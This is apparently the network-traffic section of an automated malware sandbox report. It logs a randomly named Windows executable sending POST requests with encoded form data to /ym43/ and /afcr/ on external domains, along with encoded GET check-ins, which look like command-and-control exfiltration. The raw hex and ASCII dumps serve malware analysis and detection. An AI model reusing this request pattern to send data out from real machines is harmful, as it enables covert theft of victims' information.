                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                Nov 18, 2024 16:26:03.375438929 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzEwMWUzMWYtODAxZi00NDBmLWExMTQtZGRlNGM5Yjg4ZTAxIiwicGFnZV90aW1lIjoxNzMxOTQzNT


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                7192.168.2.649990199.59.243.227801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:26:05.250812054 CET1701OUTPOST /ym43/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 1245
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.migraine-massages.pro
                                                                                                                                Origin: http://www.migraine-massages.pro
                                                                                                                                Referer: http://www.migraine-massages.pro/ym43/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 34 46 4f 67 55 31 75 54 69 38 4a 69 65 62 51 4f 6d 50 39 63 49 5a 65 33 79 55 2b 65 6c 4a 35 51 58 77 69 72 6c 2f 35 70 4d 51 62 72 61 75 67 37 51 39 55 71 65 70 76 49 70 6b 75 51 51 4c 68 42 52 58 53 58 48 6c 59 65 59 74 59 52 34 35 6f 70 75 65 2b 6d 6c 75 41 49 62 64 33 44 75 63 6e 2f 64 39 59 54 73 63 77 59 7a 78 34 51 39 64 56 4a 4c 77 42 38 34 45 4f 64 79 64 4b 7a 6a 4b 48 76 37 53 52 78 63 75 53 73 37 4d 2b 64 63 51 72 51 2f 76 32 48 33 78 78 50 6a 6c 4b 62 32 39 4b 39 54 65 51 34 68 42 53 4e 4b 2b 37 37 42 6f 4f 68 6a 53 74 61 42 41 63 4f 39 48 42 65 53 53 6d 4d 45 71 4b 54 6e 4e 5a 48 30 6d 39 71 42 72 68 53 4a 69 32 77 50 61 64 61 73 7a 6b 5a 6d 35 49 41 72 37 72 68 73 49 33 6d 70 39 70 6c 50 48 67 6c 67 46 4b 42 5a 65 44 4b 77 76 69 36 63 39 69 6a 2f 38 6b 59 43 46 6c 4d 69 46 4a 35 69 6c 49 2b 74 38 56 71 73 45 50 4d 6c 65 57 6a 78 4a 56 71 57 4d 39 47 6f 73 73 34 54 45 6c 55 6a 65 6f 6b 46 53 76 45 49 50 66 73 53 31 5a 56 43 47 33 78 [TRUNCATED]
                                                                                                                                Data Ascii: bdlD=ozicw38sFOhU+4FOgU1uTi8JiebQOmP9cIZe3yU+elJ5QXwirl/5pMQbraug7Q9UqepvIpkuQQLhBRXSXHlYeYtYR45opue+mluAIbd3Ducn/d9YTscwYzx4Q9dVJLwB84EOdydKzjKHv7SRxcuSs7M+dcQrQ/v2H3xxPjlKb29K9TeQ4hBSNK+77BoOhjStaBAcO9HBeSSmMEqKTnNZH0m9qBrhSJi2wPadaszkZm5IAr7rhsI3mp9plPHglgFKBZeDKwvi6c9ij/8kYCFlMiFJ5ilI+t8VqsEPMleWjxJVqWM9Goss4TElUjeokFSvEIPfsS1ZVCG3x1DbqctvrYLDCOXHOumqT2FmK1RV6FEdL3iTuU6jX13R4W/aYPYdD5hyjTdKSucztqCIVRJwo9OFhdJzf6g2yQgJQHfKVdGUzmxcQ135tV+nFbielw5FP9hGYdpAC9Hf/LTmAZdq7YQigAXedCIuf8rjxjZUZrYHoeiSfbeH/dXc0TrBgmDwF9suwgSZzB5OImSPh28G8Zsw4LeJX+3PUeCDyHaoS1TInTOPhV+YYjVBXYBvm32hW48PAEv3CkgoNv9XND6YfQYmHxyKGG1JQ5OGWKLp9Fjcb74t0v5yOoueLYQ4Bk11YsTAZsRobA6YfVa9sVENeoEgWe+OUfPOB0yy4f0xfhzVvExJMA5j9/OrszEgsLfhAErZC4SMGbGc4aAbbIDeH+M9UqoUATtEvuz3dQow00jSGrjYicHTlhFJO9PeoqvAJkBgMUM/KlMNY0TDiPjMKnIx55ZGavY7zdLaGiE86blm/iWk2BfjVlwrIAbMOw3E0gWgcosibOABFaCbPaOvn76D1G8Yc581eJW/NoEZUYKxs3DaHPsICRh4Pe2Bdm6G5WzoYEZmsaYLJGIGfJgFkzT2jVTYVzQF/gbtmMKNSD6wCmD2AMGfF1as0tp3G3u4hq6lweI4clpvwe/GeQCDNwLZUbTM6NXdCBmRCEnNpRy1USF [TRUNCATED]
                                                                                                                                Nov 18, 2024 16:26:05.888365984 CET1236INHTTP/1.1 200 OK
                                                                                                                                date: Mon, 18 Nov 2024 15:26:05 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                content-length: 1154
                                                                                                                                x-request-id: a1819f69-808f-416c-ac35-ed00d029073d
                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                                                                set-cookie: parking_session=a1819f69-808f-416c-ac35-ed00d029073d; expires=Mon, 18 Nov 2024 15:41:05 GMT; path=/
                                                                                                                                connection: close
                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                Nov 18, 2024 16:26:05.888410091 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTE4MTlmNjktODA4Zi00MTZjLWFjMzUtZWQwMGQwMjkwNzNkIiwicGFnZV90aW1lIjoxNzMxOTQzNT


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                8192.168.2.649992199.59.243.227801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:26:07.793571949 CET397OUTGET /ym43/?bdlD=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRQscAddRW98P8tCbtJa8oLuk3yqY6cOAnXTMvRpBjAJYE68xAYSo=&92=DPyPNvf84fs0yXSp HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                Host: www.migraine-massages.pro
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Nov 18, 2024 16:26:08.490135908 CET1236INHTTP/1.1 200 OK
                                                                                                                                date: Mon, 18 Nov 2024 15:26:08 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                content-length: 1534
                                                                                                                                x-request-id: 165e38e5-01d1-46e1-a97a-36f364691c1c
                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_jzbsF+n23rD4JtUD6e9GRb7FAFiObbVkedb2XsWOz+JbOxy3z4OcZlxyhNDLfkBRtNYZCy7oL3BS6Pj7ieXQng==
                                                                                                                                set-cookie: parking_session=165e38e5-01d1-46e1-a97a-36f364691c1c; expires=Mon, 18 Nov 2024 15:41:08 GMT; path=/
                                                                                                                                connection: close
                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6a 7a 62 73 46 2b 6e 32 33 72 44 34 4a 74 55 44 36 65 39 47 52 62 37 46 41 46 69 4f 62 62 56 6b 65 64 62 32 58 73 57 4f 7a 2b 4a 62 4f 78 79 33 7a 34 4f 63 5a 6c 78 79 68 4e 44 4c 66 6b 42 52 74 4e 59 5a 43 79 37 6f 4c 33 42 53 36 50 6a 37 69 65 58 51 6e 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_jzbsF+n23rD4JtUD6e9GRb7FAFiObbVkedb2XsWOz+JbOxy3z4OcZlxyhNDLfkBRtNYZCy7oL3BS6Pj7ieXQng==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                Nov 18, 2024 16:26:08.490158081 CET987INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTY1ZTM4ZTUtMDFkMS00NmUxLWE5N2EtMzZmMzY0NjkxYzFjIiwicGFnZV90aW1lIjoxNzMxOTQzNT


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                9192.168.2.649994209.74.64.58801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:26:21.658533096 CET640OUTPOST /afcr/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 209
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.pluribiz.life
                                                                                                                                Origin: http://www.pluribiz.life
                                                                                                                                Referer: http://www.pluribiz.life/afcr/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 6b 7a 38 48 43 47 6a 41 57 74 6f 43 58 46 37 31 71 64 76 37 6b 45 47 48 5a 6e 70 57 48 61 34 4e 35 52 77 36 6e 31 49 57 53 6f 33 6c 79 6d 4f 6e 77 2f 74 61 36 78 30 57 4f 65 47 75 54 43 4b 75 79 76 44 2f 69 64 77 33 30 6e 46 56 69 6d 4a 71 6e 35 72 59 4b 42 50 76 30 69 6c 46 48 65 55 2f 37 62 47 41 6c 32 70 2f 4b 75 70 34 37 42 4b 36 79 78 70 76 69 33 54 64 78 48 4a 30 71 61 37 64 79 56 31 37 31 37 68 36 49 78 50 37 45 56 6f 2b 34 4c 6c 4d 35 74 35 75 59 6e 48 6b 56 6b 67 39 66 6a 47 46 6d 76 6e 76 34 4c 32 47 43 4c 4f 6d 6e 4d 48 36 59 79 54 69 4d 33 62 4e 64 71 6b 46 39 4e 54 36 47 35 68 6c 6d 74 49 78
                                                                                                                                Data Ascii: bdlD=kz8HCGjAWtoCXF71qdv7kEGHZnpWHa4N5Rw6n1IWSo3lymOnw/ta6x0WOeGuTCKuyvD/idw30nFVimJqn5rYKBPv0ilFHeU/7bGAl2p/Kup47BK6yxpvi3TdxHJ0qa7dyV1717h6IxP7EVo+4LlM5t5uYnHkVkg9fjGFmvnv4L2GCLOmnMH6YyTiM3bNdqkF9NT6G5hlmtIx
                                                                                                                                Nov 18, 2024 16:26:22.389053106 CET533INHTTP/1.1 404 Not Found
                                                                                                                                Date: Mon, 18 Nov 2024 15:26:22 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 389
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                10192.168.2.649995209.74.64.58801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:26:24.204941034 CET664OUTPOST /afcr/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 233
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.pluribiz.life
                                                                                                                                Origin: http://www.pluribiz.life
                                                                                                                                Referer: http://www.pluribiz.life/afcr/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 6b 7a 38 48 43 47 6a 41 57 74 6f 43 57 6d 6a 31 70 37 6e 37 31 6b 47 45 46 33 70 57 4f 36 34 4a 35 52 4d 36 6e 30 4d 47 53 37 66 6c 79 43 4b 6e 7a 36 42 61 33 52 30 57 61 4f 47 76 4c 69 4b 70 79 76 4f 4b 69 59 49 33 30 6e 52 56 69 69 4e 71 6e 49 72 66 49 52 50 68 37 43 6b 6a 4b 2b 55 2f 37 62 47 41 6c 77 46 52 4b 75 78 34 36 78 36 36 79 54 4e 73 38 6e 54 53 34 6e 4a 30 75 61 37 52 79 56 30 63 31 2b 64 63 49 33 4c 37 45 58 67 2b 34 5a 64 4e 7a 74 34 6e 47 58 48 79 64 6e 42 78 57 56 54 4a 6f 38 50 54 70 72 47 4c 4f 64 54 38 37 2f 48 5a 4b 69 7a 67 4d 31 44 2f 64 4b 6b 76 2f 4e 72 36 55 75 74 43 70 5a 74 53 59 77 6d 4f 44 36 73 6d 67 2f 37 65 4a 63 50 2b 37 47 57 76 65 41 3d 3d
                                                                                                                                Data Ascii: bdlD=kz8HCGjAWtoCWmj1p7n71kGEF3pWO64J5RM6n0MGS7flyCKnz6Ba3R0WaOGvLiKpyvOKiYI30nRViiNqnIrfIRPh7CkjK+U/7bGAlwFRKux46x66yTNs8nTS4nJ0ua7RyV0c1+dcI3L7EXg+4ZdNzt4nGXHydnBxWVTJo8PTprGLOdT87/HZKizgM1D/dKkv/Nr6UutCpZtSYwmOD6smg/7eJcP+7GWveA==
                                                                                                                                Nov 18, 2024 16:26:24.939470053 CET533INHTTP/1.1 404 Not Found
                                                                                                                                Date: Mon, 18 Nov 2024 15:26:24 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 389
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                11192.168.2.649996209.74.64.58801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:26:26.756552935 CET1677OUTPOST /afcr/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 1245
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.pluribiz.life
                                                                                                                                Origin: http://www.pluribiz.life
                                                                                                                                Referer: http://www.pluribiz.life/afcr/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 6b 7a 38 48 43 47 6a 41 57 74 6f 43 57 6d 6a 31 70 37 6e 37 31 6b 47 45 46 33 70 57 4f 36 34 4a 35 52 4d 36 6e 30 4d 47 53 39 48 6c 79 52 43 6e 70 64 56 61 32 52 30 57 5a 4f 47 69 4c 69 4c 31 79 72 69 52 69 59 4e 49 30 6c 70 56 7a 78 46 71 68 38 2f 66 43 52 50 68 2b 79 6b 33 48 65 55 71 37 62 32 45 6c 77 31 52 4b 75 78 34 36 33 2b 36 69 52 70 73 2b 6e 54 64 78 48 49 37 71 61 36 4f 79 56 74 6a 31 2f 4e 71 49 48 72 37 45 33 77 2b 36 71 6c 4e 2f 74 34 70 48 58 47 78 64 6e 4d 7a 57 52 7a 2f 6f 39 37 35 70 73 6d 4c 4c 38 6d 39 75 38 62 2b 63 68 48 6c 64 57 4c 4b 59 73 78 66 2b 4d 33 48 53 64 56 4a 6e 4b 6c 34 41 51 6d 46 4a 72 39 31 33 65 33 2b 57 4c 2b 53 32 55 4f 2f 63 57 69 68 36 45 5a 35 69 33 66 7a 6d 49 79 44 4f 65 45 52 2f 6e 35 30 4b 43 4c 6d 52 79 73 66 43 4f 2f 44 54 63 6c 69 73 45 54 57 7a 62 6c 4e 4e 6e 64 77 62 52 77 54 4c 35 46 58 33 63 2f 6e 7a 55 4c 49 64 5a 38 7a 42 42 74 32 65 32 72 50 61 2f 4f 78 2b 56 2f 4a 41 75 68 44 58 45 2f 4a 53 51 35 78 39 78 30 4f 32 63 70 65 2f [TRUNCATED]
